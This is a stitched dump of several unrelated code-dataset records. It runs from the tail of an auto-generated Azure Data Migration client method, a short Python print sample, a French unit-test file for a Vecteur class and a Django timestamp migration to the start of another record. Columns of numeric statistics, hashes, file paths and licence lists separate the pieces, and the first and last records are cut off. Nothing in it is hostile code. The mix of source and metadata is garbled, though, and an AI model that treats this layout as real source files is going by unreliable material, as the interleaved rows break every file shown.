if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'NameAvailabilityRequest')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ApiErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('NameAvailabilityResponse', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
check_name_availability.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DataMigration/locations/{location}/checkNameAvailability'}
| 45.085399
| 196
| 0.666931
| 5,233
| 49,098
| 6.052551
| 0.054271
| 0.043949
| 0.018186
| 0.027279
| 0.922268
| 0.915954
| 0.910997
| 0.902377
| 0.90222
| 0.900609
| 0
| 0.004508
| 0.24555
| 49,098
| 1,088
| 197
| 45.126838
| 0.850548
| 0.26274
| 0
| 0.837696
| 0
| 0
| 0.141649
| 0.081318
| 0
| 0
| 0
| 0
| 0
| 1
| 0.062827
| false
| 0
| 0.008726
| 0.008726
| 0.164049
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
735334c4be4051091dbd1a72c40c71ccb3032dd7
| 66
|
py
|
Python
|
chapter-02/sample002.py
|
krastin/pp-cs3.0
|
502be9aac2d84215db176864e443c219e5e26591
|
[
"MIT"
] | null | null | null |
chapter-02/sample002.py
|
krastin/pp-cs3.0
|
502be9aac2d84215db176864e443c219e5e26591
|
[
"MIT"
] | null | null | null |
chapter-02/sample002.py
|
krastin/pp-cs3.0
|
502be9aac2d84215db176864e443c219e5e26591
|
[
"MIT"
] | null | null | null |
print(17.0 - 10)
print(17 - 10.0)
print(17 - 10.)
print(17. - 10)
| 13.2
| 16
| 0.575758
| 14
| 66
| 2.714286
| 0.285714
| 0.736842
| 0.710526
| 0.578947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 0.181818
| 66
| 4
| 17
| 16.5
| 0.37037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
73596bd9cf9690929121bc78dfaee289859c395c
| 25,158
|
py
|
Python
|
Code/API/funibot_tests/test_vecteur.py
|
philippewarren/neorobrooke-s4
|
9e9374334f8b5aa0de27b3afbd0858ddea935369
|
[
"BSD-3-Clause"
] | null | null | null |
Code/API/funibot_tests/test_vecteur.py
|
philippewarren/neorobrooke-s4
|
9e9374334f8b5aa0de27b3afbd0858ddea935369
|
[
"BSD-3-Clause"
] | 117
|
2021-01-20T21:16:07.000Z
|
2021-04-16T22:16:00.000Z
|
Code/API/funibot_tests/test_vecteur.py
|
philippewarren/neorobrooke-s4
|
9e9374334f8b5aa0de27b3afbd0858ddea935369
|
[
"BSD-3-Clause"
] | 1
|
2022-01-06T20:47:27.000Z
|
2022-01-06T20:47:27.000Z
|
from __future__ import annotations
import unittest
from funibot_api.funilib import Vecteur, ErreurChangerNormeVecteurNul
class TestVecteur(unittest.TestCase):
"""Test sur la classe Vecteur"""
def test_repr(self):
"""Test d'un vecteur pour voir s'il se représente bien"""
vecteur_test = Vecteur(3, -2, 7)
self.assertTrue(repr(vecteur_test) == "(3;-2;7)",
msg=f"__repr__() donne: {vecteur_test.__repr__()}")
def test_add(self):
"""Test d'addition de deux vecteurs"""
self.assertTrue(Vecteur(2, 7, -4) + Vecteur(-7, 2, 10) == Vecteur(-5, 9, 6),
msg=f"Vecteur(2,7,-4) + Vecteur(-7,2,10) donne: {Vecteur(2,7,-4) + Vecteur(-7,2,10)}")
def test_add_nul(self):
"""Test d'addition d'un vecteur nul avec un vecteur ayant des valeurs"""
self.assertTrue(Vecteur() + Vecteur(2, 5, 8.5) == Vecteur(2, 5, 8.5),
msg=f"Vecteur() + Vecteur(2,5,8.5) donne: {Vecteur() + Vecteur(2,5,8.5)}")
def test_add_entier(self):
"""Test d'addition d'un nombre entier à un vecteur"""
vecteur_base = Vecteur(5, -2, 13)
scalaire_entier = 8
with self.assertRaises(TypeError, msg=f"L'addition avec autre chose qu'un vecteur (comme un scalaire) n'a pas levé d'exception de type TypeError"):
vecteur_base + scalaire_entier
def test_add_none(self):
"""Test d'addition de deux vecteurs avec un None dans un des vecteurs"""
vecteur_base = Vecteur(5, -2, 13)
vecteur_none = Vecteur(1, 5, None)
with self.assertRaises(TypeError, msg=f"L'addition de deux vecteurs avec un vecteur ayant un None n'a pas levé d'exception de type TypeError"):
vecteur_base + vecteur_none
def test_iadd(self):
"""Test d'addition += de deux vecteurs"""
v = Vecteur(2, 7, -4)
v += Vecteur(-7, 2, 10)
self.assertTrue(v == Vecteur(-5, 9, 6),
msg=f"Vecteur(2,7,-4) += Vecteur(-7,2,10) donne: {v}")
def test_iadd_nul(self):
"""Test d'addition += d'un vecteur nul avec un vecteur ayant des valeurs"""
v = Vecteur()
v += Vecteur(2, 5, 8.5)
self.assertTrue(v == Vecteur(2, 5, 8.5),
msg=f"Vecteur() += Vecteur(2,5,8.5) donne: {v}")
def test_iadd_entier(self):
"""Test d'addition += d'un nombre entier à un vecteur"""
v = Vecteur(5, -2, 13)
with self.assertRaises(TypeError, msg=f"L'addition += avec autre chose qu'un vecteur (comme un scalaire) n'a pas levé d'exception de type TypeError"):
v += 8
def test_iadd_none(self):
"""Test d'addition += de deux vecteurs avec un None dans un des vecteurs"""
vecteur_base = Vecteur(5, -2, 13)
with self.assertRaises(TypeError, msg=f"L'addition += de deux vecteurs avec un vecteur ayant un None n'a pas levé d'exception de type TypeError"):
vecteur_base += Vecteur(1, 5, None)
self.assertTrue(Vecteur(5, -2, 13) == vecteur_base,
msg=f"Après l'erreur d'addition +=, le vecteur {Vecteur(5,-2,13)} n'égale pas {vecteur_base}")
def test_sub(self):
"""Test soustraction de deux vecteurs"""
self.assertTrue(Vecteur(2, 7, -4) - Vecteur(-7, 2, 10) == Vecteur(9, 5, -14),
msg=f"Vecteur(2,7,-4) - Vecteur(-7,2,10) donne: {Vecteur(2,7,-4) - Vecteur(-7,2,10)}")
def test_sub_nul(self):
"""Soustraction par un vecteur nul"""
self.assertTrue(Vecteur(2, 5, 8.5) - Vecteur() == Vecteur(2, 5, 8.5),
msg=f"Vecteur(2,5,8.5) - Vecteur() donne: {Vecteur(2,5,8.5) - Vecteur()}")
def test_sub_entier(self):
"""Test de soustraction d'un nombre entier à un vecteur"""
vecteur_base = Vecteur(5, -2, 13)
scalaire_entier = 8
with self.assertRaises(TypeError, msg=f"La soustraction avec autre chose qu'un vecteur (comme un scalaire) n'a pas levé d'exception de type TypeError"):
vecteur_base - scalaire_entier
def test_sub_none(self):
"""Test de soustraction de deux vecteurs avec un None dans un des vecteurs"""
vecteur_base = Vecteur(5, -2, 13)
vecteur_none = Vecteur(1, 5, None)
with self.assertRaises(TypeError, msg=f"La soustraction de deux vecteurs avec un vecteur ayant un None n'a pas levé d'exception de type TypeError"):
vecteur_base - vecteur_none
def test_isub(self):
"""Test de soustraction -= de deux vecteurs"""
v = Vecteur(2, 7, -4)
v -= Vecteur(-7, 2, 10)
self.assertTrue(v == Vecteur(9, 5, -14),
msg=f"Vecteur(2,7,-4) -= Vecteur(-7,2,10) donne: {v}")
def test_isub_nul(self):
"""Test de soustraction -= d'un vecteur nul avec un vecteur ayant des valeurs"""
v = Vecteur()
v -= Vecteur(2, 5, 8.5)
self.assertTrue(v == Vecteur(-2, -5, -8.5),
msg=f"Vecteur() -= Vecteur(2,5,8.5) donne: {v}")
def test_isub_entier(self):
"""Test de soustraction -= d'un nombre entier à un vecteur"""
v = Vecteur(5, -2, 13)
with self.assertRaises(TypeError, msg=f"La soustraction -= avec autre chose qu'un vecteur (comme un scalaire) n'a pas levé d'exception de type TypeError"):
v -= 8
def test_isub_none(self):
"""Test de soustraction -= de deux vecteurs avec un None dans un des vecteurs"""
vecteur_base = Vecteur(5, -2, 13)
with self.assertRaises(TypeError, msg=f"La soustraction -= de deux vecteurs avec un vecteur ayant un None n'a pas levé d'exception de type TypeError"):
vecteur_base -= Vecteur(1, 5, None)
self.assertTrue(Vecteur(5, -2, 13) == vecteur_base,
msg=f"Après l'erreur de soustraction -=, le vecteur {Vecteur(5,-2,13)} n'égale pas {vecteur_base}")
def test_mul_vecteur(self):
"""Test multiplication de deux vecteurs (vecteur * scalaire)"""
with self.assertRaises(TypeError, msg=f"La multiplication de deux vecteurs n'a pas levé d'exception de type TypeError"):
Vecteur(2, 7, -4) * Vecteur(-7, 2, 10)
def test_mul_zero(self):
"""Test de multiplication par zéro (vecteur * scalaire)"""
self.assertTrue(Vecteur(2, 5, 8.5) * 0 == Vecteur(),
msg=f"Vecteur(2,5,8.5) * 0 donne: {Vecteur(2,5,8.5) * 0}")
def test_mul_entier(self):
"""Test de multiplication d'un nombre entier à un vecteur (vecteur * scalaire)"""
vecteur_base = Vecteur(5, -2, 13)
scalaire_entier = 8
self.assertTrue(vecteur_base * scalaire_entier == Vecteur(40, -16, 104),
msg=f"Vecteur(5,-2,13) * 8 donne: {vecteur_base * scalaire_entier}")
def test_mul_reel(self):
"""Test de multiplication d'un nombre réel à un vecteur (vecteur * scalaire)"""
vecteur_base = Vecteur(5, -2, 13)
scalaire_reel = 8.45
self.assertTrue(vecteur_base * scalaire_reel == Vecteur(42.25, -16.9, 109.85),
msg=f"Vecteur(5,-2,13) * 8.45 donne: {vecteur_base * scalaire_reel}")
def test_mul_entier_negatif(self):
"""Test de multiplication d'un nombre entier négatif à un vecteur (vecteur * scalaire)"""
vecteur_base = Vecteur(5, -2, 13)
scalaire_entier_negatif = -8
self.assertTrue(vecteur_base * scalaire_entier_negatif == Vecteur(-40, 16, -104),
msg=f"Vecteur(5,-2,13) * -8 donne: {vecteur_base * scalaire_entier_negatif}")
def test_mul_none(self):
"""Test de multiplication d'un vecteur ayant un None et un scalaire (vecteur * scalaire)"""
vecteur_none = Vecteur(5, -2, None)
scalaire = 4
with self.assertRaises(TypeError, msg=f"La multiplicaiton d'un vecteur ayant un None et un scalaire n'a pas levé d'exception de type TypeError"):
vecteur_none * scalaire
def test_rmul_zero(self):
"""Test de multiplication par zéro (sclaire * vecteur)"""
self.assertTrue(0 * Vecteur(2, 5, 8.5) == Vecteur(),
msg=f"0 * Vecteur(2,5,8.5) donne: {0 * Vecteur(2,5,8.5)}")
def test_rmul_entier(self):
"""Test de multiplication d'un nombre entier à un vecteur (sclaire * vecteur)"""
vecteur_base = Vecteur(5, -2, 13)
scalaire_entier = 8
self.assertTrue(scalaire_entier * vecteur_base == Vecteur(40, -16, 104),
msg=f"8 * Vecteur(5,-2,13) donne: {scalaire_entier * vecteur_base}")
def test_rmul_reel(self):
"""Test de multiplication d'un nombre réel à un vecteur (sclaire * vecteur)"""
vecteur_base = Vecteur(5, -2, 13)
scalaire_reel = 8.45
self.assertTrue(scalaire_reel * vecteur_base == Vecteur(42.25, -16.9, 109.85),
msg=f"8.45 * Vecteur(5,-2,13) donne: {scalaire_reel * vecteur_base}")
def test_rmul_entier_negatif(self):
"""Test de multiplication d'un nombre entier négatif à un vecteur (sclaire * vecteur)"""
vecteur_base = Vecteur(5, -2, 13)
scalaire_entier_negatif = -8
self.assertTrue(scalaire_entier_negatif * vecteur_base == Vecteur(-40, 16, -104),
msg=f"-8 * Vecteur(5,-2,13) donne: {scalaire_entier_negatif * vecteur_base}")
def test_rmul_none(self):
"""Test de multiplication d'un vecteur ayant un None et un scalaire (sclaire * vecteur)"""
vecteur_none = Vecteur(5, -2, None)
scalaire = 4
with self.assertRaises(TypeError, msg=f"La multiplicaiton d'un scalaire avec un vecteur ayant un None n'a pas levé d'exception de type TypeError"):
scalaire * vecteur_none
def test_imul_vecteur(self):
"""Test multiplication *= de deux vecteurs"""
v = Vecteur(2, 7, -4)
with self.assertRaises(TypeError, msg=f"La multiplication *= de deux vecteurs n'a pas levé d'exception de type TypeError"):
v *= Vecteur(-7, 2, 10)
def test_imul_zero(self):
"""Test de multiplication *= par zéro"""
v = Vecteur(2, 5, 8.5)
v *= 0
self.assertTrue(
v == Vecteur(), msg=f"Vecteur(2,5,8.5) *= 0 donne: {v}")
def test_imul_entier(self):
"""Test de multiplication *= d'un nombre entier à un vecteur"""
v = Vecteur(5, -2, 13)
v *= 8
self.assertTrue(v == Vecteur(40, -16, 104),
msg=f"Vecteur(5,-2,13) *= 8 donne: {v}")
def test_imul_reel(self):
"""Test de multiplication *= d'un nombre réel à un vecteur"""
v = Vecteur(5, -2, 13)
v *= 8.45
self.assertTrue(v == Vecteur(42.25, -16.9, 109.85),
msg=f"Vecteur(5,-2,13) *= 8.45 donne: {v}")
def test_imul_entier_negatif(self):
"""Test de multiplication d'un nombre entier négatif à un vecteur"""
v = Vecteur(5, -2, 13)
v *= -8
self.assertTrue(v == Vecteur(-40, 16, -104),
msg=f"Vecteur(5,-2,13) *= -8 donne: {v}")
def test_imul_none(self):
"""Test de multiplication *= d'un vecteur ayant un None et d'un scalaire"""
vecteur_none = Vecteur(5, -2, None)
with self.assertRaises(TypeError, msg=f"La multiplicaiton *= d'un vecteur ayant un None et d'un scalaire n'a pas levé d'exception de type TypeError"):
vecteur_none *= 4
self.assertTrue(Vecteur(5, -2, None) == vecteur_none,
msg=f"Après l'erreur de multiplicaiton *=, le vecteur {Vecteur(5,-2,None)} n'égale pas {vecteur_none}")
def test_truediv_vecteur(self):
"""Test division de deux vecteurs"""
with self.assertRaises(TypeError, msg=f"La division d'un vecteur par un autre vecteur n'a pas levé d'exception de type TypeError"):
Vecteur(2, 7, -4) / Vecteur(-7, 2, 10)
def test_truediv_division_par_zero(self):
"""Test division par zéro"""
with self.assertRaises(ZeroDivisionError, msg=f"La division d'un vecteur par zéro n'a pas levé d'exception de type ZeroDivisionError"):
Vecteur(2, 7, -4) / 0
def test_truediv_nul_par_entier(self):
"""Test divsion du vecteur nul par un entier"""
self.assertTrue(Vecteur() / 9 == Vecteur(),
msg=f"Vecteur() / 9 donne: {Vecteur() / 9}")
def test_truediv_entier(self):
"""Test de division d'un vecteur par un nombre entier"""
vecteur_base = Vecteur(5, -2, 13)
scalaire_entier = 8
self.assertTrue(vecteur_base / scalaire_entier == Vecteur(5/8, -1/4, 13/8),
msg=f"Vecteur(5,-2,13) / 8 donne: {vecteur_base / scalaire_entier}")
def test_truediv_reel(self):
"""Test de division d'un vecteur par un nombre réel"""
vecteur_base = Vecteur(5, -2, 13)
scalaire_reel = 2.5
self.assertTrue(vecteur_base / scalaire_reel == Vecteur(2, -0.8, 5.2),
msg=f"Vecteur(5,-2,13) / 2.5 donne: {vecteur_base / scalaire_reel}")
def test_truediv_entier_negatif(self):
"""Test de division d'un vecteur par un nombre entier négatif"""
vecteur_base = Vecteur(5, -2, 13)
scalaire_entier_negatif = -8
self.assertTrue(vecteur_base / scalaire_entier_negatif == Vecteur(-5/8, 1/4, -13/8),
msg=f"Vecteur(5,-2,13) / -8 donne: {vecteur_base / scalaire_entier_negatif}")
def test_truediv_none(self):
"""Test de division d'un vecteur ayant un None avec un scalaire"""
vecteur_none = Vecteur(5, -2, None)
scalaire = 4
with self.assertRaises(TypeError, msg=f"La division d'un vecteur ayant un None par un scalaire n'a pas levé d'exception de type TypeError"):
vecteur_none / scalaire
def test_itruediv_vecteur(self):
"""Test division /= de deux vecteurs"""
v = Vecteur(2, 7, -4)
with self.assertRaises(TypeError, msg=f"La division /= d'un vecteur par un autre vecteur n'a pas levé d'exception de type TypeError"):
v /= Vecteur(-7, 2, 10)
def test_itruediv_division_par_zero(self):
"""Test division /= par zéro"""
v = Vecteur(2, 7, -4)
with self.assertRaises(ZeroDivisionError, msg=f"La division /= d'un vecteur par zéro n'a pas levé d'exception de type ZeroDivisionError"):
v /= 0
def test_itruediv_nul_par_entier(self):
"""Test divsion /= du vecteur nul par un entier"""
v = Vecteur()
v /= 9
self.assertTrue(v == Vecteur(), msg=f"Vecteur() /= 9 donne: {v}")
def test_itruediv_entier(self):
"""Test de division /= d'un vecteur par un nombre entier"""
v = Vecteur(5, -2, 13)
v /= 8
self.assertTrue(v == Vecteur(5/8, -1/4, 13/8),
msg=f"Vecteur(5,-2,13) /= 8 donne: {v}")
def test_itruediv_reel(self):
"""Test de division /= d'un vecteur par un nombre réel"""
v = Vecteur(5, -2, 13)
v /= 2.5
self.assertTrue(v == Vecteur(2, -0.8, 5.2),
msg=f"Vecteur(5,-2,13) /= 2.5 donne: {v}")
def test_itruediv_entier_negatif(self):
"""Test de division /= d'un vecteur par un nombre entier négatif"""
v = Vecteur(5, -2, 13)
v /= -8
self.assertTrue(v == Vecteur(-5/8, 1/4, -13/8),
msg=f"Vecteur(5,-2,13) /= -8 donne: {v}")
def test_itruediv_none(self):
"""Test de division /= d'un vecteur ayant un None par un scalaire"""
vecteur_none = Vecteur(5, -2, None)
with self.assertRaises(TypeError, msg=f"La division /= d'un vecteur ayant un None par un scalaire n'a pas levé d'exception de type TypeError"):
vecteur_none /= 4
self.assertTrue(Vecteur(5, -2, None) == vecteur_none,
msg=f"Après l'erreur de division /=, le vecteur {Vecteur(5,-2,None)} n'égale pas {vecteur_none}")
def test_floordiv_vecteur(self):
"""Test division // de deux vecteurs"""
with self.assertRaises(TypeError, msg=f"La division // d'un vecteur par un autre vecteur n'a pas levé d'exception de type TypeError"):
Vecteur(2.3, 7, -4) // Vecteur(-7, 2.1, 10)
def test_floordiv_division_par_zero(self):
"""Test division // par zéro"""
with self.assertRaises(ZeroDivisionError, msg=f"La division // d'un vecteur par zéro n'a pas levé d'exception de type ZeroDivisionError"):
Vecteur(2, 7, -4) // 0
def test_floordiv_nul_par_entier(self):
"""Test divsion // du vecteur nul par un entier"""
self.assertTrue(Vecteur() // 9 == Vecteur(),
msg=f"Vecteur() // 9 donne: {Vecteur() // 9}")
def test_floordiv_entier(self):
"""Test de division // d'un vecteur par un nombre entier"""
vecteur_base = Vecteur(5, -2, 13)
scalaire_entier = 8
self.assertTrue(vecteur_base // scalaire_entier == Vecteur(0, -1, 1),
msg=f"Vecteur(5,-2,13) // 8 donne: {vecteur_base // scalaire_entier}")
def test_floordiv_reel(self):
"""Test de division // d'un vecteur par un nombre réel"""
vecteur_base = Vecteur(5, -2, 13)
scalaire_reel = 2.5
self.assertTrue(vecteur_base // scalaire_reel == Vecteur(2.0, -1.0, 5.0),
msg=f"Vecteur(5,-2,13) // 2.5 donne: {vecteur_base // scalaire_reel}")
def test_floordiv_reel_negatif(self):
"""Test de division // d'un vecteur par un nombre réel négatif"""
vecteur_base = Vecteur(5, -2, 13)
scalaire_reel_negatif = -1.5
self.assertTrue(vecteur_base // scalaire_reel_negatif == Vecteur(-4.0, 1.0, -9.0),
msg=f"Vecteur(5,-2,13) // -1.5 donne: {vecteur_base // scalaire_reel_negatif}")
def test_floordiv_none(self):
"""Test de division // d'un vecteur ayant un None par un scalaire"""
vecteur_none = Vecteur(5, -2, None)
scalaire = 4
with self.assertRaises(TypeError, msg=f"La division // d'un vecteur ayant un None par un scalaire n'a pas levé d'exception de type TypeError"):
vecteur_none // scalaire
def test_ifloordiv_vecteur(self):
"""Test division //= de deux vecteurs"""
v = Vecteur(2.3, 7, -4)
with self.assertRaises(TypeError, msg=f"La division //= d'un vecteur par un autre vecteur n'a pas levé d'exception de type TypeError"):
v //= Vecteur(-7, 2.1, 10)
def test_ifloordiv_division_par_zero(self):
"""Test division //= par zéro"""
v = Vecteur(2, 7, -4)
with self.assertRaises(ZeroDivisionError, msg=f"La division //= d'un vecteur par zéro n'a pas levé d'exception de type ZeroDivisionError"):
v // 0
def test_ifloordiv_nul_par_entier(self):
"""Test divsion //= du vecteur nul par un entier"""
v = Vecteur()
v //= 9
self.assertTrue(v == Vecteur(), msg=f"Vecteur() //= 9 donne: {v}")
def test_ifloordiv_entier(self):
"""Test de division //= d'un vecteur par un nombre entier"""
v = Vecteur(5, -2, 13)
v //= 8
self.assertTrue(v == Vecteur(0, -1, 1),
msg=f"Vecteur(5,-2,13) //= 8 donne: {v}")
def test_ifloordiv_reel(self):
"""Test de division //= d'un vecteur par un nombre réel"""
v = Vecteur(5, -2, 13)
v //= 2.5
self.assertTrue(v == Vecteur(2.0, -1.0, 5.0),
msg=f"Vecteur(5,-2,13) //= 2.5 donne: {v}")
def test_ifloordiv_reel_negatif(self):
"""Test de division //= d'un vecteur par un nombre réel négatif"""
v = Vecteur(5, -2, 13)
v //= -1.5
self.assertTrue(v == Vecteur(-4.0, 1.0, -9.0),
msg=f"Vecteur(5,-2,13) //= -1.5 donne: {v}")
def test_ifloordiv_none(self):
"""Test de division //= d'un vecteur ayant un None par un scalaire"""
vecteur_none = Vecteur(5, -2, None)
with self.assertRaises(TypeError, msg=f"La division /= d'un vecteur ayant un None par un scalaire n'a pas levé d'exception de type TypeError"):
vecteur_none //= 4
self.assertTrue(Vecteur(5, -2, None) == vecteur_none,
msg=f"Après l'erreur de division //=, le vecteur {Vecteur(5,-2,None)} n'égale pas {vecteur_none}")
def test_unitaire(self):
"""Test vecteur unitaire"""
self.assertTrue(Vecteur(2, -5, 3).unitaire() == Vecteur(0.3244428422615251, -0.8111071056538127,
0.48666426339228763), msg=f"Le vecteur unitaire de Vecteur(2,-5,3) donne: {Vecteur(2,-5,3).unitaire()}")
def test_unitaire_vecteur_nul(self):
"""Test vecteur unitaire du vecteur nul"""
self.assertTrue(Vecteur().unitaire() == Vecteur(
), msg=f"Le vecteur unitaire du vecteur nul donne: {Vecteur().unitaire()}")
def test_ne(self):
"""Test vecteur non égaux"""
self.assertTrue(Vecteur(1, 2, 3) != Vecteur(
1, 2, 4), msg=f"Les vecteurs {Vecteur(1,2,3)} et {Vecteur(1,2,4)} sont égaux")
def test_norme(self):
"""Test de la norme d'un vecteur"""
self.assertTrue(Vecteur(3, 4, 0).norme == 5,
msg=f"La norme du Vecteur(3,4,0) donne: {Vecteur(3,4,0).norme}")
def test_norme_null(self):
"""Test de la norme du vecteur null"""
self.assertTrue(Vecteur(0, 0, 0).norme == 0,
msg=f"La norme du Vecteur(0,0,0) donne: {Vecteur(0,0,0).norme}")
def test_norme_none(self):
"""Test de la norme d'un vecteur ayant un None"""
with self.assertRaises(TypeError, msg=f"La norme d'un vecteur ayant None n'a pas levé d'exception de type TypeError"):
Vecteur(3, 4, None).norme == 5
def test_norme_changement(self):
"""Test du changement de norme"""
vecteur_base = Vecteur(3, 4, 0)
vecteur_base.norme = 2.5
self.assertTrue(vecteur_base.x == 1.5,
msg=f"La composante en x du Vecteur(3,4,0) en imposant sa norme à 2.5 donne: {vecteur_base.x}")
self.assertTrue(
vecteur_base.y == 2, msg=f"La composante en y du Vecteur(3,4,0) en imposant sa norme à 2.5 donne: {vecteur_base.y}")
self.assertTrue(
vecteur_base.z == 0, msg=f"La composante en z du Vecteur(3,4,0) en imposant sa norme à 2.5 donne: {vecteur_base.z}")
def test_norme_changement_pour_0(self):
"""Test du changement de norme par 0"""
vecteur_base = Vecteur(3, 4, 0)
vecteur_base.norme = 0
self.assertTrue(
vecteur_base.x == 0, msg=f"La composante en x du Vecteur(3,4,0) en imposant sa norme à 0 donne: {vecteur_base.x}")
self.assertTrue(
vecteur_base.y == 0, msg=f"La composante en y du Vecteur(3,4,0) en imposant sa norme à 0 donne: {vecteur_base.y}")
self.assertTrue(
vecteur_base.z == 0, msg=f"La composante en z du Vecteur(3,4,0) en imposant sa norme à 0 donne: {vecteur_base.z}")
def test_norme_changement_vecteur_null(self):
"""Test du changement de norme d'un vecteur null"""
vecteur_null = Vecteur(0, 0, 0)
with self.assertRaises(ErreurChangerNormeVecteurNul, msg=f"La modification de la norme d'un vecteur null n'a pas levé d'exception de type ChangerNormeVecteurNulErreur"):
vecteur_null.norme = 2.5
def test_norme_changement_none(self):
"""Test du changement de norme par un None"""
vecteur_base = Vecteur(3, 4, 0)
with self.assertRaises(TypeError, msg=f"La division /= d'un vecteur ayant un None par un scalaire n'a pas levé d'exception de type TypeError"):
vecteur_base.norme = None
self.assertTrue(
vecteur_base.x == 3, msg=f"Après l'erreur du changement de norme, la composante en x du vecteur modifié {vecteur_base.x} n'égale pas la composante en x du vecteur de base 3")
self.assertTrue(
vecteur_base.y == 4, msg=f"Après l'erreur du changement de norme, la composante en y du vecteur modifié {vecteur_base.y} n'égale pas la composante en y du vecteur de base 4")
self.assertTrue(
vecteur_base.z == 0, msg=f"Après l'erreur du changement de norme, la composante en z du vecteur modifié {vecteur_base.z} n'égale pas la composante en z du vecteur de base 0")
def test_tuple(self):
"""Test de la création d'un tuple"""
v = Vecteur(1, 2, 3)
v_tuple = v.vers_tuple()
self.assertTrue(type(v_tuple) == tuple,
msg=f"La création d'un tuple à partir du vecteur n'a pas fonctionné")
self.assertTrue(
v_tuple[0] == v.x, msg=f"La valeur du Tuple à la position 0, {v_tuple[0]} n'égale pas la composante en x du Vecteur de départ, {v.x}")
self.assertTrue(
v_tuple[1] == v.y, msg=f"La valeur du Tuple à la position 1, {v_tuple[1]} n'égale pas la composante en y du Vecteur de départ, {v.y}")
self.assertTrue(
v_tuple[2] == v.z, msg=f"La valeur du Tuple à la position 2, {v_tuple[2]} n'égale pas la composante en z du Vecteur de départ, {v.z}")
| 50.927126
| 186
| 0.603188
| 3,726
| 25,158
| 3.98014
| 0.039184
| 0.023736
| 0.040661
| 0.040054
| 0.891976
| 0.845651
| 0.81261
| 0.776804
| 0.760148
| 0.743898
| 0
| 0.048554
| 0.264846
| 25,158
| 493
| 187
| 51.030426
| 0.753285
| 0.150052
| 0
| 0.255814
| 0
| 0.145349
| 0.315724
| 0.01147
| 0
| 0
| 0
| 0
| 0.255814
| 1
| 0.212209
| false
| 0
| 0.008721
| 0
| 0.223837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b41eac0fb545335c3317ecb5b09eb1d3edadd722
| 2,250
|
py
|
Python
|
apps/greencheck/migrations/0003_timestamped_ranges_approvals.py
|
eharris128/admin-portal
|
cb9e2ec1c8c47092a2297ca58bef41e37e2b7f51
|
[
"Apache-2.0"
] | null | null | null |
apps/greencheck/migrations/0003_timestamped_ranges_approvals.py
|
eharris128/admin-portal
|
cb9e2ec1c8c47092a2297ca58bef41e37e2b7f51
|
[
"Apache-2.0"
] | null | null | null |
apps/greencheck/migrations/0003_timestamped_ranges_approvals.py
|
eharris128/admin-portal
|
cb9e2ec1c8c47092a2297ca58bef41e37e2b7f51
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 2.2.7 on 2019-11-20 14:14
from django.db import migrations
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
('greencheck', '0002_approval_original_id_nullable'),
]
operations = [
migrations.AddField(
model_name='greencheckasn',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created'),
),
migrations.AddField(
model_name='greencheckasn',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified'),
),
migrations.AddField(
model_name='greencheckasnapprove',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created'),
),
migrations.AddField(
model_name='greencheckasnapprove',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified'),
),
migrations.AddField(
model_name='greencheckip',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created'),
),
migrations.AddField(
model_name='greencheckip',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified'),
),
migrations.AddField(
model_name='greencheckipapprove',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created'),
),
migrations.AddField(
model_name='greencheckipapprove',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified'),
),
]
| 40.178571
| 135
| 0.652889
| 213
| 2,250
| 6.760563
| 0.206573
| 0.06875
| 0.11875
| 0.15
| 0.858333
| 0.858333
| 0.750694
| 0.750694
| 0.750694
| 0.750694
| 0
| 0.01104
| 0.235111
| 2,250
| 55
| 136
| 40.909091
| 0.825683
| 0.02
| 0
| 0.816327
| 1
| 0
| 0.132547
| 0.015434
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.061224
| 0
| 0.122449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b47be1bca86696601c57bd60b06ed56686e77d72
| 251
|
py
|
